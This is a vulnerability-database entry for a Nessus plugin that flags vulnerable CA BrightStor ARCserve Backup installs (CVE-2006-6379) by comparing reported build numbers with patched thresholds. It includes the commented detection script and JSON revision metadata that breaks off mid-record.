CA BrightStor ARCserve Backup Discovery Service Overflow
2006-12-12T00:00:00
ID ARCSERVE_DISCOVERY_SERVICE_OVERFLOW.NASL Type nessus Reporter Tenable Modified 2018-11-15T00:00:00
Description
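According to its version, the installation of BrightStor ARCserve
Backup on the remote host allows an attacker to execute arbitrary code
on the affected host with SYSTEM privileges due to a buffer overflow
that can be triggered by a specially crafted packet sent to the
Discovery Service.
Note that the vendor reports that only Windows installs are vulnerable.
The check is version-based: the plugin compares the recorded version and
build with per-release build thresholds and sends no triggering packet,
so the result reflects the reported build rather than a confirmed overflow.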
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
# Registration block. It runs when the `description` variable is set, i.e.
# when the scanner loads the plugin for its metadata; the exit(0) at the end
# keeps the detection logic further down from running in that mode.
if (description)
{
# Plugin identity and revision stamp.
script_id(23841);
script_version("1.15");
script_cvs_date("Date: 2018/11/15 20:50:26");
# Cross-references for the single issue this plugin reports.
script_cve_id("CVE-2006-6379");
script_bugtraq_id(21502);
script_name(english:"CA BrightStor ARCserve Backup Discovery Service Overflow");
# The summary states the method: a version comparison, not a probe of the flaw.
script_summary(english:"Checks version of BrightStor ARCserve Backup");
script_set_attribute(attribute:"synopsis", value:
"The remote service is affected by a buffer overflow vulnerability.");
script_set_attribute(attribute:"description", value:
"According to its version, the installation of BrightStor ARCserve
Backup on the remote host allows an attacker to execute arbitrary code
on the affected host with SYSTEM privileges due to a buffer overflow
that can be triggered by a specially crafted packet sent to the
Discovery Service.
Note that the vendor reports only Windows installs are vulnerable.");
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?34d9360c");
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded");
script_set_attribute(attribute:"solution", value:
"Either apply the appropriate patch as described in the vendor advisory
referenced above or upgrade to BrightStor ARCserve Backup r11.5 SP2 or
later.");
# CVSS v2 base vector: reachable over the network, low access complexity,
# no authentication, partial impact on confidentiality, integrity and
# availability.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
# CVSS v2 temporal vector: proof-of-concept exploit code (E:POC), official
# fix available (RL:OF), report confirmed (RC:C).
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value:"2006/12/12");
script_set_attribute(attribute:"vuln_publication_date", value:"2006/12/08");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:ca:arcserve_backup");
script_end_attributes();
# ACT_GATHER_INFO places the plugin among the information-gathering checks;
# the logic after this block only reads knowledge-base items.
script_category(ACT_GATHER_INFO);
script_family(english:"Windows");
script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");
# These plugins run first. Presumably os_fingerprint.nasl supplies Host/OS
# and arcserve_discovery_service_detect.nasl stores the version string and
# the UDP port read below -- confirm against those plugins.
script_dependencies("arcserve_discovery_service_detect.nasl", "os_fingerprint.nasl");
# Only the version key is declared as required; Host/OS and
# Services/udp/casdscsvc are not listed, so the body tests them itself.
script_require_keys("ARCSERVE/Discovery/Version");
exit(0);
}
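# Detection logic: report the host when the ARCserve Discovery Service
# version recorded in the knowledge base falls in an affected release/build.
# Nothing is sent to the service here. The verdict rests entirely on the
# recorded version string, so a finding means "version indicates vulnerable",
# not a confirmed overflow.

# The vendor reports only Windows installs as vulnerable; stop unless the
# OS fingerprint contains "Windows".
os = get_kb_item("Host/OS");
if (!os || "Windows" >!< os) exit(0);

ver = get_kb_item("ARCSERVE/Discovery/Version");
if (isnull(ver)) exit(0);

port = get_kb_item("Services/udp/casdscsvc");
if (!port) exit(0);

# Expected form: one lowercase letter, "major.minor", then " (build NNNN)".
# Constructed example: "r11.5 (build 4000)".
# NOTE(review): a version string in any other form ends the check without a
# finding and without any trace in the scan output.
matches = eregmatch(string:ver, pattern:"^[a-z]([0-9]+\.[0-9]+) \(build ([0-9]+)\)$");
if (!isnull(matches))
{
  release = matches[1];
  build = int(matches[2]);

  # Same release/build conditions as before; each branch also records why the
  # host is flagged, so the finding carries its own evidence.
  reason = NULL;
  if (release == "11.5")
  {
    if (build < 4232) reason = "build is lower than 4232";
  }
  else if (release == "11.1")
  {
    if (build < 3205) reason = "build is lower than 3205";
  }
  # nb: QI82917 says there's no patch for 11.0; the solution is to
  # upgrade to 11.1 and then apply QO82863.
  else if (release == "11.0")
    reason = "no patch for 11.0 (QI82917); upgrade to 11.1 and apply QO82863";
  # nb: QO84611 doesn't exist.
  else if (release == "10.5")
    reason = "every 10.5 build is flagged by this check";
  else if (release == "9.0")
  {
    if (build < 2203) reason = "build is lower than 2203";
  }

  if (!isnull(reason))
  {
    # ver has already passed the strict pattern above, so echoing it into the
    # report cannot carry unexpected content from the remote service.
    report =
      '\n  Reported version : ' + ver +
      '\n  Flagged because  : ' + reason + '\n';
    security_hole(port:port, proto:"udp", extra:report);
  }
}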
{"id": "ARCSERVE_DISCOVERY_SERVICE_OVERFLOW.NASL", "bulletinFamily": "scanner", "title": "CA BrightStor ARCserve Backup Discovery Service Overflow", "description": "According to its version, the installation of BrightStor ARCserve\nBackup on the remote host allows an attacker to execute arbitrary code\non the affected host with SYSTEM privileges due to a buffer overflow\nthat can be triggered by a specially crafted packet sent to the\nDiscovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.", "published": "2006-12-12T00:00:00", "modified": "2018-11-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=23841", "reporter": "Tenable", "references": ["https://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded", "http://www.nessus.org/u?34d9360c"], "cvelist": ["CVE-2006-6379"], "type": "nessus", "lastseen": "2019-01-16T20:07:03", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:ca:arcserve_backup"], "cvelist": ["CVE-2006-6379"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "According to its version, the installation of BrightStor ARCserve Backup on the remote host allows an attacker to execute arbitrary code on the affected host with SYSTEM privileges due to a buffer overflow that can be triggered by a specially crafted packet sent to the Discovery Service. 
\n\nNote that the vendor reports only Windows installs are vulnerable.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "a2adbdfec3a472194c7b9bd7400a81343340e771ca76af7646f1b615d3c54ce2", "hashmap": [{"hash": "10b5ca3aa252884cd2c8c50302b4cf87", "key": "cpe"}, {"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "6d24eb5093dd0c7a2f0cd2b4f1e7c699", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "1c1b844e81f60edc6af816d8949a07b0", "key": "pluginID"}, {"hash": "eefb5aa3e910cd8cf2b7612550ab24f8", "key": "references"}, {"hash": "afa83ac780a3bef839cd2eac311c3b43", "key": "cvelist"}, {"hash": "728473341116a99431f0ee4793831664", "key": "modified"}, {"hash": "ec68938fd283cbe4329e1a4083d56721", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "6bdce82dcc94ff26304f84c904af1ec5", "key": "sourceData"}, {"hash": "c55db14813ed5b06a609aab225b62959", "key": "description"}, {"hash": "26328e0ecfef985ee1e44581d0630ce0", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=23841", "id": "ARCSERVE_DISCOVERY_SERVICE_OVERFLOW.NASL", "lastseen": "2018-06-29T05:35:41", "modified": "2018-06-27T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "23841", "published": "2006-12-12T00:00:00", "references": ["http://www.nessus.org/u?34d9360c", "http://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23841);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/06/27 18:42:27\");\n\n script_cve_id(\"CVE-2006-6379\");\n script_bugtraq_id(21502);\n\n script_name(english:\"CA BrightStor ARCserve Backup 
Discovery Service Overflow\");\n script_summary(english:\"Checks version of BrightStor ARCserve Backup\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote service is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of BrightStor ARCserve\nBackup on the remote host allows an attacker to execute arbitrary code\non the affected host with SYSTEM privileges due to a buffer overflow\nthat can be triggered by a specially crafted packet sent to the\nDiscovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34d9360c\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either apply the appropriate patch as described in the vendor advisory\nreferenced above or upgrade to BrightStor ARCserve Backup r11.5 SP2 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:arcserve_backup\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"arcserve_discovery_service_detect.nasl\", 
\"os_fingerprint.nasl\");\n script_require_keys(\"ARCSERVE/Discovery/Version\");\n\n exit(0);\n}\n\n\nos = get_kb_item(\"Host/OS\");\nif (!os || \"Windows\" >!< os) exit(0);\n\n\nver = get_kb_item(\"ARCSERVE/Discovery/Version\");\nif (isnull(ver)) exit(0);\n\nport = get_kb_item(\"Services/udp/casdscsvc\");\nif (!port) exit(0);\n\n\nmatches = eregmatch(string:ver, pattern:\"^[a-z]([0-9]+\\.[0-9]+) \\(build ([0-9]+)\\)$\");\nif (!isnull(matches))\n{\n ver = matches[1];\n build = int(matches[2]);\n\n if (\n (ver == \"11.5\" && build < 4232) ||\n (ver == \"11.1\" && build < 3205) ||\n # nb: QI82917 says there's no patch for 11.0; the solution is to \n # upgrade to 11.1 and then apply QO82863.\n (ver == \"11.0\") ||\n # nb: QO84611 doesn't exist.\n (ver == \"10.5\") ||\n (ver == \"9.0\" && build < 2203)\n ) security_hole(port:port, proto:\"udp\");\n}\n", "title": "CA BrightStor ARCserve Backup Discovery Service Overflow", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-06-29T05:35:41"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:ca:arcserve_backup"], "cvelist": ["CVE-2006-6379"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "According to its version, the installation of BrightStor ARCserve Backup on the remote host allows an attacker to execute arbitrary code on the affected host with SYSTEM privileges due to a buffer overflow that can be triggered by a specially crafted packet sent to the Discovery Service. 
\n\nNote that the vendor reports only Windows installs are vulnerable.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "beaea84aae3b3cba52a74f8ef3477d7831dd7c433376f54326b2d2d276969bce", "hashmap": [{"hash": "10b5ca3aa252884cd2c8c50302b4cf87", "key": "cpe"}, {"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "6d24eb5093dd0c7a2f0cd2b4f1e7c699", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "1c1b844e81f60edc6af816d8949a07b0", "key": "pluginID"}, {"hash": "eefb5aa3e910cd8cf2b7612550ab24f8", "key": "references"}, {"hash": "afa83ac780a3bef839cd2eac311c3b43", "key": "cvelist"}, {"hash": "728473341116a99431f0ee4793831664", "key": "modified"}, {"hash": "ec68938fd283cbe4329e1a4083d56721", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "6bdce82dcc94ff26304f84c904af1ec5", "key": "sourceData"}, {"hash": "c55db14813ed5b06a609aab225b62959", "key": "description"}, {"hash": "26328e0ecfef985ee1e44581d0630ce0", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=23841", "id": "ARCSERVE_DISCOVERY_SERVICE_OVERFLOW.NASL", "lastseen": "2018-08-30T19:34:34", "modified": "2018-06-27T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "23841", "published": "2006-12-12T00:00:00", "references": ["http://www.nessus.org/u?34d9360c", "http://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23841);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/06/27 18:42:27\");\n\n script_cve_id(\"CVE-2006-6379\");\n script_bugtraq_id(21502);\n\n script_name(english:\"CA BrightStor ARCserve Backup 
Discovery Service Overflow\");\n script_summary(english:\"Checks version of BrightStor ARCserve Backup\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote service is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of BrightStor ARCserve\nBackup on the remote host allows an attacker to execute arbitrary code\non the affected host with SYSTEM privileges due to a buffer overflow\nthat can be triggered by a specially crafted packet sent to the\nDiscovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34d9360c\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either apply the appropriate patch as described in the vendor advisory\nreferenced above or upgrade to BrightStor ARCserve Backup r11.5 SP2 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:arcserve_backup\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"arcserve_discovery_service_detect.nasl\", 
\"os_fingerprint.nasl\");\n script_require_keys(\"ARCSERVE/Discovery/Version\");\n\n exit(0);\n}\n\n\nos = get_kb_item(\"Host/OS\");\nif (!os || \"Windows\" >!< os) exit(0);\n\n\nver = get_kb_item(\"ARCSERVE/Discovery/Version\");\nif (isnull(ver)) exit(0);\n\nport = get_kb_item(\"Services/udp/casdscsvc\");\nif (!port) exit(0);\n\n\nmatches = eregmatch(string:ver, pattern:\"^[a-z]([0-9]+\\.[0-9]+) \\(build ([0-9]+)\\)$\");\nif (!isnull(matches))\n{\n ver = matches[1];\n build = int(matches[2]);\n\n if (\n (ver == \"11.5\" && build < 4232) ||\n (ver == \"11.1\" && build < 3205) ||\n # nb: QI82917 says there's no patch for 11.0; the solution is to \n # upgrade to 11.1 and then apply QO82863.\n (ver == \"11.0\") ||\n # nb: QO84611 doesn't exist.\n (ver == \"10.5\") ||\n (ver == \"9.0\" && build < 2203)\n ) security_hole(port:port, proto:\"udp\");\n}\n", "title": "CA BrightStor ARCserve Backup Discovery Service Overflow", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:34:34"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:ca:arcserve_backup"], "cvelist": ["CVE-2006-6379"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "According to its version, the installation of BrightStor ARCserve Backup on the remote host allows an attacker to execute arbitrary code on the affected host with SYSTEM privileges due to a buffer overflow that can be triggered by a specially crafted packet sent to the Discovery Service. 
\n\nNote that the vendor reports only Windows installs are vulnerable.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "a2adbdfec3a472194c7b9bd7400a81343340e771ca76af7646f1b615d3c54ce2", "hashmap": [{"hash": "10b5ca3aa252884cd2c8c50302b4cf87", "key": "cpe"}, {"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "6d24eb5093dd0c7a2f0cd2b4f1e7c699", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "1c1b844e81f60edc6af816d8949a07b0", "key": "pluginID"}, {"hash": "eefb5aa3e910cd8cf2b7612550ab24f8", "key": "references"}, {"hash": "afa83ac780a3bef839cd2eac311c3b43", "key": "cvelist"}, {"hash": "728473341116a99431f0ee4793831664", "key": "modified"}, {"hash": "ec68938fd283cbe4329e1a4083d56721", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "6bdce82dcc94ff26304f84c904af1ec5", "key": "sourceData"}, {"hash": "c55db14813ed5b06a609aab225b62959", "key": "description"}, {"hash": "26328e0ecfef985ee1e44581d0630ce0", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=23841", "id": "ARCSERVE_DISCOVERY_SERVICE_OVERFLOW.NASL", "lastseen": "2018-09-01T23:38:22", "modified": "2018-06-27T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "23841", "published": "2006-12-12T00:00:00", "references": ["http://www.nessus.org/u?34d9360c", "http://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23841);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/06/27 18:42:27\");\n\n script_cve_id(\"CVE-2006-6379\");\n script_bugtraq_id(21502);\n\n script_name(english:\"CA BrightStor ARCserve Backup 
Discovery Service Overflow\");\n script_summary(english:\"Checks version of BrightStor ARCserve Backup\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote service is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of BrightStor ARCserve\nBackup on the remote host allows an attacker to execute arbitrary code\non the affected host with SYSTEM privileges due to a buffer overflow\nthat can be triggered by a specially crafted packet sent to the\nDiscovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34d9360c\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either apply the appropriate patch as described in the vendor advisory\nreferenced above or upgrade to BrightStor ARCserve Backup r11.5 SP2 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:arcserve_backup\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"arcserve_discovery_service_detect.nasl\", 
\"os_fingerprint.nasl\");\n script_require_keys(\"ARCSERVE/Discovery/Version\");\n\n exit(0);\n}\n\n\nos = get_kb_item(\"Host/OS\");\nif (!os || \"Windows\" >!< os) exit(0);\n\n\nver = get_kb_item(\"ARCSERVE/Discovery/Version\");\nif (isnull(ver)) exit(0);\n\nport = get_kb_item(\"Services/udp/casdscsvc\");\nif (!port) exit(0);\n\n\nmatches = eregmatch(string:ver, pattern:\"^[a-z]([0-9]+\\.[0-9]+) \\(build ([0-9]+)\\)$\");\nif (!isnull(matches))\n{\n ver = matches[1];\n build = int(matches[2]);\n\n if (\n (ver == \"11.5\" && build < 4232) ||\n (ver == \"11.1\" && build < 3205) ||\n # nb: QI82917 says there's no patch for 11.0; the solution is to \n # upgrade to 11.1 and then apply QO82863.\n (ver == \"11.0\") ||\n # nb: QO84611 doesn't exist.\n (ver == \"10.5\") ||\n (ver == \"9.0\" && build < 2203)\n ) security_hole(port:port, proto:\"udp\");\n}\n", "title": "CA BrightStor ARCserve Backup Discovery Service Overflow", "type": "nessus", "viewCount": 1}, "differentElements": ["references", "modified", "sourceData"], "edition": 5, "lastseen": "2018-09-01T23:38:22"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:ca:arcserve_backup"], "cvelist": ["CVE-2006-6379"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "According to its version, the installation of BrightStor ARCserve Backup on the remote host allows an attacker to execute arbitrary code on the affected host with SYSTEM privileges due to a buffer overflow that can be triggered by a specially crafted packet sent to the Discovery Service. 
\n\nNote that the vendor reports only Windows installs are vulnerable.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "97803c325b0889b49fa0bfaf9be3d4e04dfb6444f526c6b724cd778779ddab1c", "hashmap": [{"hash": "10b5ca3aa252884cd2c8c50302b4cf87", "key": "cpe"}, {"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "6d24eb5093dd0c7a2f0cd2b4f1e7c699", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "1c1b844e81f60edc6af816d8949a07b0", "key": "pluginID"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "3df95bb580deecca3f439f8e778654f1", "key": "sourceData"}, {"hash": "afa83ac780a3bef839cd2eac311c3b43", "key": "cvelist"}, {"hash": "ec68938fd283cbe4329e1a4083d56721", "key": "href"}, {"hash": "edd4a2e72a7e4c07d2c8b0ad00509f59", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "c55db14813ed5b06a609aab225b62959", "key": "description"}, {"hash": "26328e0ecfef985ee1e44581d0630ce0", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=23841", "id": "ARCSERVE_DISCOVERY_SERVICE_OVERFLOW.NASL", "lastseen": "2018-11-16T16:53:47", "modified": "2018-11-15T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "23841", "published": "2006-12-12T00:00:00", "references": ["https://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded", "http://www.nessus.org/u?34d9360c"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23841);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\"CVE-2006-6379\");\n script_bugtraq_id(21502);\n\n script_name(english:\"CA BrightStor ARCserve 
Backup Discovery Service Overflow\");\n script_summary(english:\"Checks version of BrightStor ARCserve Backup\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote service is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of BrightStor ARCserve\nBackup on the remote host allows an attacker to execute arbitrary code\non the affected host with SYSTEM privileges due to a buffer overflow\nthat can be triggered by a specially crafted packet sent to the\nDiscovery Service. \n\nNote that the vendor reports only Windows installs are vulnerable.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34d9360c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/archive/1/453916/100/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either apply the appropriate patch as described in the vendor advisory\nreferenced above or upgrade to BrightStor ARCserve Backup r11.5 SP2 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:arcserve_backup\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n 
script_dependencies(\"arcserve_discovery_service_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"ARCSERVE/Discovery/Version\");\n\n exit(0);\n}\n\n\nos = get_kb_item(\"Host/OS\");\nif (!os || \"Windows\" >!< os) exit(0);\n\n\nver = get_kb_item(\"ARCSERVE/Discovery/Version\");\nif (isnull(ver)) exit(0);\n\nport = get_kb_item(\"Services/udp/casdscsvc\");\nif (!port) exit(0);\n\n\nmatches = eregmatch(string:ver, pattern:\"^[a-z]([0-9]+\\.[0-9]+) \\(build ([0-9]+)\\)$\");\nif (!isnull(matches))\n{\n ver = matches[1];\n build = int(matches[2]);\n\n if (\n (ver == \"11.5\" && build < 4232) ||\n (ver == \"11.1\" && build < 3205) ||\n # nb: QI82917 says there's no patch for 11.0; the solution is to \n # upgrade to 11.1 and then apply QO82863.\n (ver == \"11.0\") ||\n # nb: QO84611 doesn't exist.\n (ver == \"10.5\") ||\n (ver == \"9.0\" && build < 2203)\n ) security_hole(port:port, proto:\"udp\");\n}\n", "title": "CA BrightStor ARCserve Backup Discovery Service Overflow", "type": "nessus", "viewCount": 1}, "differentElements": ["description"], "edition": 6, "lastseen": "2018-11-16T16:53:47"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:ca:arcserve_backup"], "cvelist": ["CVE-2006-6379"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "According to its version, the installation of BrightStor ARCserve Backup on the remote host allows an attacker to execute arbitrary code on the affected host with SYSTEM privileges due to a buffer overflow that can be triggered by a specially crafted packet sent to the Discovery Service. 
\n\nNote that the vendor reports only Windows installs are vulnerable.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "e1de81fc05a619ba5a232d6fe5a0d766d023ad18f82759dafd44004d7d229fd9", "hashmap": [{"hash": "10b5ca3aa252884cd2c8c50302b4cf87", "key": "cpe"}, {"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "253070b2147836c5b000d6f0e62c8663", "key": "modified"}, {"hash": "6d24eb5093dd0c7a2f0cd2b4f1e7c699", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "1c1b844e81f60edc6af816d8949a07b0", "key": "pluginID"}, {"hash": "eefb5aa3e910cd8cf2b7612550ab24f8", "key": "references"}, {"hash": "7f3490b6cc1073c858e0dedd24527124", "key": "sourceData"}, {"hash": "afa83ac780a3bef839cd2eac311c3b43", "key": "cvelist"}, {"hash": "ec68938fd283cbe4329e1a4083d56721", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": 